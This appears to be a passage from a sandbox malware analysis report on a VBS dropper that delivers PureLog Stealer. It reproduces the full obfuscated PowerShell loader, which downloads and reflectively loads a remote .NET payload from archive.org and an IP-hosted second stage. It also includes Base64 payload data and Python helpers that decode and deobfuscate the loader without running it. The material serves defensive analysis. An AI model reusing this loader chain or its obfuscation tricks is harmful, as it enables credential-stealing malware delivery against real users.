                                                          Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                          Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC
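The 200 OK above is served as text/plain, but the body begins with TVqQAAMAAAAEAAAA, which is the Base64 encoding of an MZ header, and the rest of the first Data Ascii chunk decodes to the DOS stub and the start of a PE header. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample. It decodes the printed prefix (the run of A characters, i.e. the zero bytes of the DOS header, is written as a repetition so the offsets stay exact, and the incomplete trailing Base64 group is dropped rather than padded) and reads the DOS header, the COFF header and the optional-header Magic. On this prefix it reports a PE32 image for x86 with three sections and the DLL characteristic set, which fits a payload destined for [Reflection.Assembly]::Load rather than for direct execution.

```python
"""Triage the "text file" the loader fetches from archive.org.

The body served for /24/items/detah-note-v/DetahNoteV.txt starts with
TVqQAAMAAAAEAAAA, the Base64 encoding of an MZ header. Decoding the first
chunk and reading the DOS and COFF headers says what kind of image hides
behind the .txt extension, without touching the rest of the 2.8 MB file.
"""
import base64
import struct

# Start of the response body as printed in the report's Data Ascii column.
# The run of 'A' characters (zero bytes of the DOS header) is written as a
# repetition so byte offsets stay exact; the last group is incomplete
# because the report prints one TCP segment at a time.
SAMPLE_B64 = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA" + "A" * 44
    + "gAAAAA4fug4AtAnNIbgBTM0h"
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu"
    + "DQ0KJAAAAAAAAABQ" + "RQAATAEDABoCBboA" + "AAAAAAAAAOAADiEL"
    + "ATAAAEYgAAAIAAAA" + "AAAAvmUgAAAgAAAA" + "gCAAAABAAAAgAAAA" + "AgA"
)

IMAGE_FILE_DLL = 0x2000
MACHINES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def decode_prefix(b64_text: str) -> bytes:
    """Decode a Base64 stream that may stop mid-group (tail dropped, not padded)."""
    compact = "".join(b64_text.split())
    return base64.b64decode(compact[: len(compact) // 4 * 4])


def triage_pe(data: bytes) -> dict:
    """Parse just enough of a PE image to classify it."""
    info = {"is_mz": data[:2] == b"MZ", "is_pe": False}
    if not info["is_mz"] or len(data) < 0x40:
        return info
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    info["e_lfanew"] = e_lfanew
    # "PE\0\0" + 20-byte COFF header + 2-byte optional-header Magic = 26 bytes
    if len(data) < e_lfanew + 26 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    machine, nsections, _stamp, _symtab, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
    info.update(
        is_pe=True,
        machine=MACHINES.get(machine, hex(machine)),
        sections=nsections,
        is_dll=bool(characteristics & IMAGE_FILE_DLL),
        pe32_plus=(magic == 0x20B),
        optional_header_size=opt_size,
        dos_stub_text=b"This program cannot be run in DOS mode." in data[:e_lfanew],
    )
    return info


if __name__ == "__main__":
    decoded = decode_prefix(SAMPLE_B64)
    for key, value in triage_pe(decoded).items():
        print(f"{key:>22}: {value}")
```

The same two functions work on the full download: read the file, pass its text to decode_prefix and the result to triage_pe. Anything with a Content-Type of text/plain whose decoded body passes this check deserves the same treatment as a downloaded executable.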


                                                          Target ID:0
                                                          Start time:23:30:34
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
                                                          Imagebase:0x7ff7ae350000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:23:30:35
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:23:30:35
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:23:30:37
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true
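The Target ID 3 command line is the decoded second stage, and it hides its script behind four cheap layers: the script is spelled as '+'-joined single-quoted fragments, two .Replace() calls turn the placeholder CNA into a quote character ([string][char]39) and gYF into $, the second-stage URL argument is stored reversed, and the result is piped into $env:COMSPEC[4,26,25] -join '', which picks the letters i, e and x out of C:\Windows\system32\cmd.exe. The Python below is an added analyst helper, not part of the Joe Sandbox report or of the sample; it peels those layers statically, so nothing from the sample is executed. Its one assumption is the default value of %COMSPEC%, which the report does not record.

```python
"""Peel the layers off the PowerShell one-liner run by Target ID 3, without
executing any of it.

The script is built from '+'-joined single-quoted fragments, then two
.Replace() calls turn the placeholder CNA into a quote character
([string][char]39) and gYF into '$', and the result is piped into
$env:COMSPEC[4,26,25] -join '', which spells the cmdlet name. The
second-stage URL is stored reversed. Each function undoes one layer.
"""
from __future__ import annotations

import re

# The argument of -command from the report's Target ID 3 entry, copied
# verbatim and split over several lines at '+' boundaries.
OBFUSCATED = (
    r"('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'"
    r"+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '"
    r"+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'"
    r"+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'"
    r"+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'"
    r"+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$')"
    r" | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
)

# Assumed: %COMSPEC% of a stock Windows install. The report does not show
# the sandbox's environment block, so this is the analyst's assumption.
ASSUMED_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}

LITERAL = re.compile(r"'((?:[^']|'')*)'")        # PowerShell single-quoted literal
REPLACE_CALL = re.compile(
    r"\.replace\(\s*'((?:[^']|'')*)'\s*,\s*([^)]*)\)", re.IGNORECASE)
CHAR_CAST = re.compile(r"\[string\]\s*\[char\]\s*(\d+)", re.IGNORECASE)
ENV_INDEX = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
URL = re.compile(r"https?://\S+")


def unquote(body: str) -> str:
    """Inside a single-quoted PowerShell literal, '' is an escaped quote."""
    return body.replace("''", "'")


def concat_fragments(expr: str) -> str:
    """Join every single-quoted fragment of a ('a'+'b'+...) expression."""
    return "".join(unquote(m.group(1)) for m in LITERAL.finditer(expr))


def resolve_replace_arg(arg: str) -> str:
    """Evaluate the argument forms this sample passes to .Replace()."""
    arg = arg.strip()
    if m := CHAR_CAST.fullmatch(arg):
        return chr(int(m.group(1)))      # [string][char]39 -> "'"
    if m := LITERAL.fullmatch(arg):
        return unquote(m.group(1))       # '$' -> "$"
    raise ValueError(f"unsupported .Replace() argument: {arg!r}")


def resolve_invoker(expr: str, env: dict[str, str]) -> str:
    """Rebuild a cmdlet name spelled from indexed characters of an env var."""
    m = ENV_INDEX.search(expr)
    if m is None:
        raise ValueError("no $env:VAR[i,j,k] -join '' pattern found")
    value = env[m.group(1).upper()]
    return "".join(value[int(i)] for i in m.group(2).split(","))


def deobfuscate(command: str, env: dict[str, str] | None = None) -> dict:
    env = env or ASSUMED_ENV
    head, _, tail = command.partition(" | ")
    replaces = list(REPLACE_CALL.finditer(head))
    expr = head[: replaces[0].start()] if replaces else head
    script = concat_fragments(expr)
    for call in replaces:                # .Replace() calls apply left to right
        script = script.replace(unquote(call.group(1)),
                                resolve_replace_arg(call.group(2)))
    literals = [unquote(s) for s in LITERAL.findall(script)]
    reversed_urls = [s[::-1] for s in literals
                     if URL.fullmatch(s[::-1]) and not URL.fullmatch(s)]
    return {"invoker": resolve_invoker(tail, env), "script": script,
            "strings": literals, "reversed_urls": reversed_urls}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED)
    print("piped into:", result["invoker"])
    print(result["script"])
    print("reversed second-stage URL(s):", result["reversed_urls"])
```

What comes out: the archive.org URL that the HTTPS session above fetched, the type RunPE.Home and method VAI that the loaded assembly is asked for, and the reversed argument http://104.168.32.148/345/CHPPZA.txt, which is exactly the GET that returned 404 in the HTTP session. The remaining arguments (desativado, Portuguese for "disabled", three times; RegAsm; an empty string) are handed to that method; the report does not show how the assembly uses them.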

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1816180929.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                            • Instruction ID: a80c8cd11ff045cf1758e7ef6960007ee9c999f62fdb26ee7e32c7126f981996
                                                            • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                            • Instruction Fuzzy Hash: AB01A77020CB0C4FDB48EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB41
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4f8c216c6e71b6ecb5c6e5ddeee722773088d6d8a59883c899db62ced26d42c
                                                            • Instruction ID: 65acf131b584eb9085a4f4df2b0962974db00729729b750ba329752d7b4ba3ee
                                                            • Opcode Fuzzy Hash: c4f8c216c6e71b6ecb5c6e5ddeee722773088d6d8a59883c899db62ced26d42c
                                                            • Instruction Fuzzy Hash: 22623722B1FB8D0FE7A69B684C655B43BE1EF5A710B0A01FFD44DC71A3D919AD068381
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID: